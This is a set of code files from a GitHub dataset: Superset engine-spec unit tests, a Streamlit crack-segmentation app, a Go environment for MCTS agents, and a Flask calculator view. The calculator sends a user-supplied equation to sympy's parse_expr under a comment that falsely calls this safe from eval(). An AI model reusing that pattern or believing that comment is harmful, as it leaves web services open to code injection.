FROM tbl\"]\n\n\ndef test_parse_sql_multi_statement() -> None:\n \"\"\"\n For string with multiple SQL-statements `parse_sql` method should return list\n where each element represents the single SQL-statement\n \"\"\"\n\n from superset.db_engine_specs.base import BaseEngineSpec\n\n queries = BaseEngineSpec.parse_sql(\"SELECT foo FROM tbl1; SELECT bar FROM tbl2;\")\n assert queries == [\n \"SELECT foo FROM tbl1\",\n \"SELECT bar FROM tbl2\",\n ]\n\n\n@pytest.mark.parametrize(\n \"original,expected\",\n [\n (\n dedent(\n \"\"\"\nwith currency as\n(\nselect 'INR' as cur\n)\nselect * from currency\n\"\"\"\n ),\n None,\n ),\n (\n \"SELECT 1 as cnt\",\n None,\n ),\n (\n dedent(\n \"\"\"\nselect 'INR' as cur\nunion\nselect 'AUD' as cur\nunion\nselect 'USD' as cur\n\"\"\"\n ),\n None,\n ),\n ],\n)\ndef test_cte_query_parsing(original: types.TypeEngine, expected: str) -> None:\n from superset.db_engine_specs.base import BaseEngineSpec\n\n actual = BaseEngineSpec.get_cte_query(original)\n assert actual == expected\n\n\n@pytest.mark.parametrize(\n \"native_type,sqla_type,attrs,generic_type,is_dttm\",\n [\n (\"SMALLINT\", types.SmallInteger, None, GenericDataType.NUMERIC, False),\n (\"INTEGER\", types.Integer, None, GenericDataType.NUMERIC, False),\n (\"BIGINT\", types.BigInteger, None, GenericDataType.NUMERIC, False),\n (\"DECIMAL\", types.Numeric, None, GenericDataType.NUMERIC, False),\n (\"NUMERIC\", types.Numeric, None, GenericDataType.NUMERIC, False),\n (\"REAL\", types.REAL, None, GenericDataType.NUMERIC, False),\n (\"DOUBLE PRECISION\", types.Float, None, GenericDataType.NUMERIC, False),\n (\"MONEY\", types.Numeric, None, GenericDataType.NUMERIC, False),\n # String\n (\"CHAR\", types.String, None, GenericDataType.STRING, False),\n (\"VARCHAR\", types.String, None, 
GenericDataType.STRING, False),\n (\"TEXT\", types.String, None, GenericDataType.STRING, False),\n # Temporal\n (\"DATE\", types.Date, None, GenericDataType.TEMPORAL, True),\n (\"TIMESTAMP\", types.TIMESTAMP, None, GenericDataType.TEMPORAL, True),\n (\"TIME\", types.Time, None, GenericDataType.TEMPORAL, True),\n # Boolean\n (\"BOOLEAN\", types.Boolean, None, GenericDataType.BOOLEAN, False),\n ],\n)\ndef test_get_column_spec(\n native_type: str,\n sqla_type: type[types.TypeEngine],\n attrs: Optional[dict[str, Any]],\n generic_type: GenericDataType,\n is_dttm: bool,\n) -> None:\n from superset.db_engine_specs.databricks import DatabricksNativeEngineSpec as spec\n\n assert_column_spec(spec, native_type, sqla_type, attrs, generic_type, is_dttm)\n\n\n@pytest.mark.parametrize(\n \"cols, expected_result\",\n [\n (\n [SQLAColumnType(name=\"John\", type=\"integer\", is_dttm=False)],\n [\n ResultSetColumnType(\n column_name=\"John\", name=\"John\", type=\"integer\", is_dttm=False\n )\n ],\n ),\n (\n [SQLAColumnType(name=\"hugh\", type=\"integer\", is_dttm=False)],\n [\n ResultSetColumnType(\n column_name=\"hugh\", name=\"hugh\", type=\"integer\", is_dttm=False\n )\n ],\n ),\n ],\n)\ndef test_convert_inspector_columns(\n cols: list[SQLAColumnType], expected_result: list[ResultSetColumnType]\n):\n from superset.db_engine_specs.base import convert_inspector_columns\n\n assert convert_inspector_columns(cols) == expected_result\n", "repo_name": "apache/superset", "sub_path": "tests/unit_tests/db_engine_specs/test_base.py", "file_name": "test_base.py", "file_ext": "py", "file_size_in_byte": 4578, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55269, "dataset": "github-code", "pt": "61", "api": [{"api_name": "superset.db_engine_specs.base.BaseEngineSpec.get_text_clause", "line_number": 19, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec", "line_number": 19, "usage_type": "name"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec.parse_sql", "line_number": 32, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec", "line_number": 32, "usage_type": "name"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec.parse_sql", "line_number": 44, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec", "line_number": 44, "usage_type": "name"}, {"api_name": "sqlalchemy.types.TypeEngine", "line_number": 84, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 84, "usage_type": "name"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec.get_cte_query", "line_number": 87, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.base.BaseEngineSpec", "line_number": 87, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 51, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 51, "usage_type": "attribute"}, {"api_name": "textwrap.dedent", "line_number": 55, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 71, "usage_type": "call"}, {"api_name": "sqlalchemy.types.TypeEngine", "line_number": 116, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 117, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 117, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 118, "usage_type": "name"}, {"api_name": 
"tests.unit_tests.db_engine_specs.utils.assert_column_spec", "line_number": 123, "usage_type": "call"}, {"api_name": "superset.db_engine_specs.databricks.DatabricksNativeEngineSpec", "line_number": 123, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 91, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types.SmallInteger", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 94, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 94, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 94, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Integer", "line_number": 95, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 95, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 95, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 95, "usage_type": "name"}, {"api_name": "sqlalchemy.types.BigInteger", "line_number": 96, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 96, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 96, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 96, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Numeric", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 97, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 97, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 97, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Numeric", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 98, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 98, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 98, "usage_type": "name"}, {"api_name": "sqlalchemy.types.REAL", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 99, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 99, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 99, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Float", "line_number": 100, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 100, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 100, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 100, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Numeric", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 101, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.NUMERIC", "line_number": 101, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 101, "usage_type": "name"}, {"api_name": "sqlalchemy.types.String", "line_number": 103, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 103, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.STRING", "line_number": 103, 
"usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 103, "usage_type": "name"}, {"api_name": "sqlalchemy.types.String", "line_number": 104, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 104, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.STRING", "line_number": 104, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 104, "usage_type": "name"}, {"api_name": "sqlalchemy.types.String", "line_number": 105, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 105, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.STRING", "line_number": 105, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 105, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Date", "line_number": 107, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 107, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.TEMPORAL", "line_number": 107, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 107, "usage_type": "name"}, {"api_name": "sqlalchemy.types.TIMESTAMP", "line_number": 108, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 108, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.TEMPORAL", "line_number": 108, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 108, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Time", "line_number": 109, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 109, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.TEMPORAL", "line_number": 109, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 109, "usage_type": "name"}, {"api_name": "sqlalchemy.types.Boolean", "line_number": 111, "usage_type": "attribute"}, {"api_name": "sqlalchemy.types", "line_number": 111, "usage_type": "name"}, {"api_name": "superset.utils.core.GenericDataType.BOOLEAN", "line_number": 111, "usage_type": "attribute"}, {"api_name": "superset.utils.core.GenericDataType", "line_number": 111, "usage_type": "name"}, {"api_name": "superset.superset_typing.SQLAColumnType", "line_number": 148, "usage_type": "name"}, {"api_name": "superset.superset_typing.ResultSetColumnType", "line_number": 148, "usage_type": "name"}, {"api_name": "superset.db_engine_specs.base.convert_inspector_columns", "line_number": 152, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 126, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 126, "usage_type": "attribute"}, {"api_name": "superset.superset_typing.SQLAColumnType", "line_number": 130, "usage_type": "call"}, {"api_name": "superset.superset_typing.ResultSetColumnType", "line_number": 132, "usage_type": "call"}, {"api_name": "superset.superset_typing.SQLAColumnType", "line_number": 138, "usage_type": "call"}, {"api_name": "superset.superset_typing.ResultSetColumnType", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "30298133265", "text": "# Imports\nimport streamlit as st\nimport cv2\nimport numpy as np\nfrom Functions import Pipeline, vid_create\n\nst.title(\"\"\":blue[Pi-segment.AI]\"\"\")\nst.write('Welcome to Pi-Segment, a product of Pithun-Corp.AI who focuses on innovative application of Artificial'\n ' Intelligence to the domain of 
Civil Engineering, enhancing all areas of it from structural '\n 'optimization to health monitoring to population forecasting to aid optimal structure planning.')\n\nst.write('Pi-Segment performs crack segmentation on images and videos using preprocessing'\n ' techniques.')\n\n# Creating the option to upload image or video\nfile_type = ['Image', 'Video']\noption_file_type = st.selectbox('Upload Video or Image?', options=file_type)\n\nif option_file_type == 'Image':\n file = st.file_uploader(\"Upload an image\", type=[\"jpg\", \"png\", \"jpeg\"])\nelif option_file_type == 'Video':\n file = st.file_uploader(\"Upload a Video\", type=[\"mp4\", \"mov\", \"avi\"])\n\n\nif file is not None and option_file_type == 'Image':\n file_bytes = np.asarray(bytearray(file.read()), dtype=np.uint8)\n img = cv2.imdecode(file_bytes, 1)\n st.write('Segmenting in a sec...')\n seg_img = Pipeline(img)\n st.image(seg_img)\nelif file is not None and option_file_type == 'Video':\n vid_create(file)\n # Provide download button for the processed video\n output_path = \"output_video.mp4\"\n st.download_button(\n label=\"Download Processed Video\",\n data=open(output_path, \"rb\").read(),\n key=\"processed_video\",\n file_name=\"output_video.mp4\",\n mime=\"video/mp4\",\n ) \n\n\n\n\n\n", "repo_name": "pithun/Crack-Detection-using-CNNs", "sub_path": "App_Deployment/Streamlit_app_Pisegment.py", "file_name": "Streamlit_app_Pisegment.py", "file_ext": "py", "file_size_in_byte": 1613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.title", "line_number": 7, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 8, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 17, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 28, "usage_type": "call"}, {"api_name": "Functions.Pipeline", "line_number": 29, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 30, "usage_type": "call"}, {"api_name": "Functions.vid_create", "line_number": 32, "usage_type": "call"}, {"api_name": "streamlit.download_button", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "16923878349", "text": "import pickle\nimport random\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, Tuple\n\nimport numpy as np\nimport pygame\nfrom torch import nn\n\nfrom .go_base import (\n BLACK,\n BOARD_SIZE,\n PASS_MOVE,\n WHITE,\n all_legal_moves,\n game_over,\n int_to_coord,\n is_move_legal,\n play_move,\n result,\n score,\n)\nfrom .render import render_game\nfrom .state import State\n\nHERE = Path(__file__).parent.resolve()\nMAIN_PATH = HERE.parent / \"main\"\n\n\nALL_POSSIBLE_MOVES = np.arange(BOARD_SIZE**2 + 1)\n\n# Visuals\nSCREEN_SIZE = (500, 500)\n\n# The komi to use is much debated. 7.5 seems to\n# generalise well for different board sizes\n# lifein19x19.com/viewtopic.php?f=15&t=17750\n# 7.5 is also the komi used in alpha-go vs Lee Sedol\n# (non-integer means there are no draws)\n\nKOMI = 7.5\n\n############# Functions useful for MCTS ###############\n\n
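# Illustrative rollout sketch (added note, not from the original file) showing how\n# the pure helpers below compose for MCTS:\n#   s = State()\n#   while not is_terminal(s):\n#       s = transition_function(s, random.choice(all_legal_moves(s.board, s.ko)))\n#   black_return = reward_function(s)  # from black's perspective: one of {0, 1, -1}\n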
\n\ndef transition_function(state: State, action: int) -> State:\n \"\"\"Returns the state that would be reached by taking 'action' in 'state'.\"\"\"\n return play_move(state, action, state.to_play)\n\n\ndef reward_function(state: State) -> int:\n \"\"\"Returns the reward received by black in the current state.\n\n One of {0, 1, -1}.\n \"\"\"\n assert state.board is not None\n return result(state.board, KOMI) if game_over(state.recent_moves) else 0\n\n\ndef is_terminal(state: State) -> bool:\n \"\"\"Returns True if the game is over, False otherwise.\"\"\"\n return game_over(state.recent_moves)\n\n\ndef play_go(\n your_choose_move: Callable,\n opponent_choose_move: Callable,\n game_speed_multiplier: float = 1.0,\n render: bool = True,\n verbose: bool = False,\n) -> float:\n\n env = GoEnv(\n opponent_choose_move,\n verbose=verbose,\n render=render,\n game_speed_multiplier=game_speed_multiplier,\n )\n\n state, reward, done, info = env.reset()\n while not done:\n action = your_choose_move(state=state)\n state, reward, done, info = env.step(action)\n return reward\n\n\nclass GoEnv:\n def __init__(\n self,\n opponent_choose_move: Callable,\n verbose: bool = False,\n render: bool = False,\n game_speed_multiplier: float = 1.0,\n ):\n \"\"\"As in other environments, but note: a single call to step() advances the game\n by two moves (the player's move and the opponent's reply), hence the pure\n functions above should be used for MCTS.\n \"\"\"\n\n self.opponent_choose_move = opponent_choose_move\n self.render = render\n self.verbose = verbose\n self.game_speed_multiplier = game_speed_multiplier\n\n self.state = State()\n\n if render:\n self.init_visuals()\n\n def init_visuals(self) -> None:\n pygame.init()\n self.screen = pygame.display.set_mode(SCREEN_SIZE)\n pygame.display.set_caption(\"Go\")\n self._render_game()\n\n def _render_game(\n self,\n ) -> None:\n render_game(self.state.board, screen=self.screen)\n\n @property\n def reward(self) -> int:\n if self.player_color == BLACK:\n return reward_function(self.state)\n else:\n return reward_function(self.state) * -1\n\n @property\n def done(self) -> bool:\n return is_terminal(self.state)\n\n def reset(self, player_black: bool = False) -> Tuple[State, float, bool, Dict]:\n\n # 1 is black and goes first, white is -1 and goes second\n self.player_color = BLACK if player_black else random.choice([BLACK, WHITE])\n self.color_str = \"Black\" if self.player_color == BLACK else \"White\"\n\n self.state = State()\n\n if self.verbose:\n print(\n f\"Resetting Game.\\nYou are playing with the {self.color_str} tiles.\\nBlack plays first\\n\\n\"\n )\n\n if self.state.to_play != self.player_color:\n self._step(\n self.opponent_choose_move(state=self.state),\n )\n\n return self.state, self.reward, self.done, {}\n\n def move_to_string(self, move: int) -> str:\n\n assert self.state.board is not None\n N = self.state.board.shape[0]\n if move == N**2:\n return \"passes\"\n return f\"places counter at coordinate: {(move//N, move%N)}\"\n\n def __str__(self) -> str:\n return str(self.state.board) + \"\\n\"\n\n def _step(self, move: int) -> None:\n\n if self.verbose:\n name = \"player\" if self.state.to_play == self.player_color else \"opponent\"\n print(f\"{name} {self.move_to_string(move)}\")\n\n assert not self.done, \"Game is done! 
Please reset() the env before calling step() again\"\n assert is_move_legal(\n int_to_coord(move), self.state.board, self.state.ko\n ), f\"{move} is an illegal move\"\n\n self.state = transition_function(self.state, move)\n\n if self.render:\n self._render_game()\n\n def step(self, move: int) -> Tuple[State, int, bool, Dict]:\n\n assert self.state.to_play == self.player_color\n self._step(move)\n\n if not self.done:\n self._step(self.opponent_choose_move(state=self.state))\n\n if self.verbose and self.done:\n self.nice_prints() # Probably not needed\n\n return self.state, self.reward, self.done, {}\n\n def nice_prints(self):\n print(\n f\"\\nGame over. Reward = {self.reward}.\\n\"\n f\"Player was playing as {self.color_str}\\n\"\n f\"Black has {np.sum(self.state.board==1)} counters.\\n\"\n f\"White has {np.sum(self.state.board==-1)} counters.\\n\"\n f\"Your score is {self.player_color * score(self.state.board, KOMI)}.\\n\"\n )\n\n\ndef choose_move_randomly(state: State) -> int:\n legal_moves = all_legal_moves(state.board, state.ko)\n return legal_moves[int(random.random() * len(legal_moves))]\n\n\ndef choose_move_pass(state: State) -> int:\n \"\"\"Always pass.\"\"\"\n return PASS_MOVE\n\n\ndef load_pkl(team_name: str, network_folder: Path = MAIN_PATH) -> nn.Module:\n net_path = network_folder / f\"{team_name}_file.pkl\"\n assert (\n net_path.exists()\n ), f\"Network saved using TEAM_NAME='{team_name}' doesn't exist! ({net_path})\"\n with open(net_path, \"rb\") as handle:\n file = pickle.load(handle)\n return file\n\n\ndef save_pkl(file: Any, team_name: str) -> None:\n assert \"/\" not in team_name, \"Invalid TEAM_NAME. '/' are illegal in TEAM_NAME\"\n net_path = MAIN_PATH / f\"{team_name}_file.pkl\"\n n_retries = 5\n for attempt in range(n_retries):\n try:\n with open(net_path, \"wb\") as handle:\n pickle.dump(file, handle, protocol=pickle.HIGHEST_PROTOCOL)\n load_pkl(team_name)\n return\n except Exception:\n if attempt == n_retries - 1:\n raise\n\n\n# Need to know the default screen size from petting zoo to get which square is clicked\n# Will not work with a screen override\nSQUARE_SIZE = SCREEN_SIZE[0] // BOARD_SIZE\nLEFT = 1\nRIGHT = 3\n\n\ndef pos_to_coord(pos: Tuple[int, int]) -> Tuple[int, int]:\n \"\"\"Used in human_player only.\"\"\"\n\n col = pos[0] // SQUARE_SIZE\n row = pos[1] // SQUARE_SIZE\n return row, col\n\n\ndef coord_to_int(coord: Tuple[int, int]) -> int:\n return coord[0] * BOARD_SIZE + coord[1]\n\n\ndef human_player(state: State) -> int:\n\n print(\"\\nYour move, click to place a tile!\")\n legal_moves = all_legal_moves(state.board, state.ko)\n if len(legal_moves) == 1:\n print(\"You have no legal moves, so you pass\")\n return legal_moves[0]\n\n while True:\n ev = pygame.event.get()\n for event in ev:\n if event.type == pygame.MOUSEBUTTONUP and event.button == LEFT:\n coord = pos_to_coord(pygame.mouse.get_pos())\n action = coord_to_int(coord)\n if action in legal_moves:\n return action\n elif event.type == pygame.MOUSEBUTTONUP and event.button == RIGHT:\n return PASS_MOVE\n", "repo_name": "tomhartke/RL-demonstrations", "sub_path": "MCTS-AlphaGoZero/Go-Agent/game_mechanics/go_env.py", "file_name": "go_env.py", "file_ext": "py", "file_size_in_byte": 7834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 30, "usage_type": "call"}, {"api_name": "go_base.BOARD_SIZE", "line_number": 30, 
"usage_type": "name"}, {"api_name": "state.State", "line_number": 46, "usage_type": "name"}, {"api_name": "go_base.play_move", "line_number": 48, "usage_type": "call"}, {"api_name": "state.to_play", "line_number": 48, "usage_type": "attribute"}, {"api_name": "state.State", "line_number": 51, "usage_type": "name"}, {"api_name": "state.board", "line_number": 56, "usage_type": "attribute"}, {"api_name": "go_base.game_over", "line_number": 57, "usage_type": "call"}, {"api_name": "state.recent_moves", "line_number": 57, "usage_type": "attribute"}, {"api_name": "go_base.result", "line_number": 57, "usage_type": "call"}, {"api_name": "state.board", "line_number": 57, "usage_type": "attribute"}, {"api_name": "state.State", "line_number": 60, "usage_type": "name"}, {"api_name": "go_base.game_over", "line_number": 62, "usage_type": "call"}, {"api_name": "state.recent_moves", "line_number": 62, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 90, "usage_type": "name"}, {"api_name": "state.State", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 112, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 113, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 113, "usage_type": "attribute"}, {"api_name": "render.render_game", "line_number": 119, "usage_type": "call"}, {"api_name": "go_base.BLACK", "line_number": 123, "usage_type": "name"}, {"api_name": "go_base.BLACK", "line_number": 135, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 135, "usage_type": "call"}, {"api_name": "go_base.WHITE", "line_number": 135, "usage_type": "name"}, {"api_name": "go_base.BLACK", "line_number": 136, "usage_type": "name"}, {"api_name": "state.State", "line_number": 138, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 132, "usage_type": "name"}, {"api_name": "state.State", "line_number": 132, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 132, "usage_type": "name"}, {"api_name": "go_base.is_move_legal", "line_number": 170, "usage_type": "call"}, {"api_name": "go_base.int_to_coord", "line_number": 171, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 179, "usage_type": "name"}, {"api_name": "state.State", "line_number": 179, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 179, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 197, "usage_type": "call"}, {"api_name": "go_base.score", "line_number": 198, "usage_type": "call"}, {"api_name": "state.State", "line_number": 202, "usage_type": "name"}, {"api_name": "go_base.all_legal_moves", "line_number": 203, "usage_type": "call"}, {"api_name": "state.board", "line_number": 203, "usage_type": "attribute"}, {"api_name": "state.ko", "line_number": 203, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 204, "usage_type": "call"}, {"api_name": "state.State", "line_number": 207, "usage_type": "name"}, {"api_name": "go_base.PASS_MOVE", "line_number": 209, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 212, "usage_type": "name"}, {"api_name": "pickle.load", 
"line_number": 218, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 212, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 212, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 222, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 229, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 229, "usage_type": "attribute"}, {"api_name": "go_base.BOARD_SIZE", "line_number": 239, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 244, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 252, "usage_type": "name"}, {"api_name": "go_base.BOARD_SIZE", "line_number": 253, "usage_type": "name"}, {"api_name": "state.State", "line_number": 256, "usage_type": "name"}, {"api_name": "go_base.all_legal_moves", "line_number": 259, "usage_type": "call"}, {"api_name": "state.board", "line_number": 259, "usage_type": "attribute"}, {"api_name": "state.ko", "line_number": 259, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 265, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 265, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 267, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 268, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 268, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 272, "usage_type": "attribute"}, {"api_name": "go_base.PASS_MOVE", "line_number": 273, "usage_type": "name"}]} +{"seq_id": "5159300475", "text": "from flask import render_template, request, jsonify\n\n# Flask-classy imports\nfrom flask.ext.classy import FlaskView, route\n\n# SymPY imports to do symbolic math without python's unsafe eval()\nfrom sympy.parsing.sympy_parser import parse_expr\n\n# We need the python stdlib random for some fun at the end.\nimport random\n\n########################################################################################################################\n## View Class\n########################################################################################################################\nclass CalcView(FlaskView):\n \"\"\"\n A simple calculator view for Flask-Classy.\n Relies on ajax/jsonify to communicate to the View.\n \"\"\"\n def index(self):\n \"\"\"\n Returns a rendered web template containing the calculator frame.\n @return: A rendered template\n \"\"\"\n return render_template('calc/calc.html')\n\n def csscalc(self):\n \"\"\"\n Returns a rendered web template containing the calculator frame.\n @return: A rendered template\n \"\"\"\n return render_template('calc/csscalc.html')\n\n def csscalc2(self):\n \"\"\"\n Returns a rendered web template containing the calculator frame.\n @return: A rendered template\n \"\"\"\n return render_template('calc/csscalc2.html')\n\n def equation(self):\n \"\"\"\n Calculates the result of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n eq = request.args.get('equation')\n answer = do_calc(eq)\n print( \"We were asked to calculate {} and returned the answer: {}\".format(eq, answer) )\n return jsonify(result=\"{}\".format(answer))\n\n def add_num(self):\n \"\"\"\n Calculates the result of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n a = request.args.get('a', 3, type=int)\n b = request.args.get('b', 4, type=int)\n print( \"The Addition Result from calculating {} 
\n def add_num(self):\n \"\"\"\n Calculates the sum of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n a = request.args.get('a', 3, type=int)\n b = request.args.get('b', 4, type=int)\n print( \"The Addition Result from calculating {} and {} was: {}\".format(a, b, a + b))\n return jsonify(result=\"{}\".format(a + b))\n\n def subtract_num(self):\n \"\"\"\n Calculates the difference of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n a = request.args.get('a', 3, type=int)\n b = request.args.get('b', 4, type=int)\n print(\"The Subtraction Result from calculating {} and {} was: {}\".format(a, b, a - b))\n return jsonify(result=\"{}\".format(a - b))\n\n def multiply_num(self):\n \"\"\"\n Calculates the product of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n a = request.args.get('a', 3, type=int)\n b = request.args.get('b', 4, type=int)\n print(\"The Multiply Result from calculating {} and {} was: {}\".format(a, b, a * b))\n return jsonify(result=\"{}\".format(a * b))\n\n def divide_num(self):\n \"\"\"\n Calculates the quotient of two numbers using arguments a and b.\n @return: A json object containing the calculation result\n \"\"\"\n a = request.args.get('a', 3, type=int)\n b = request.args.get('b', 4, type=int)\n print(\"The Divide Result from calculating {} and {} was: {}\".format(a, b, a / b))\n return jsonify(result=\"{}\".format(a / b))\n\n########################################################################################################################\n## Helper Functions\n########################################################################################################################\n\ndef do_calc(equation):\n \"\"\"\n Calculates the result of an equation using argument equation.\n @return: The calculation result, or an insult string if parsing fails \n \"\"\"\n try:\n theanswer = parse_expr(equation)\n return theanswer\n except SyntaxError:\n return random_insult()\n\ndef random_insult():\n \"\"\"\n Calculates the idiocy of a user misusing an equation.\n @return: A string containing an insult \n \"\"\"\n insults = [\n \"DO I LOOK LIKE A SUCKER?STOP TREATING ME LIKE ONE.\",\n \"DO I LOOK LIKE A TI-81?I CAN'T DO GRAPHS!\",\n \"WHAT THE HELL IS YOUR PROBLEM?ARE NUMBERS TOO COMPLEX TO GRASP, MEATSACK?\",\n \"I'M REALLY GETTING BORED.YOU'RE 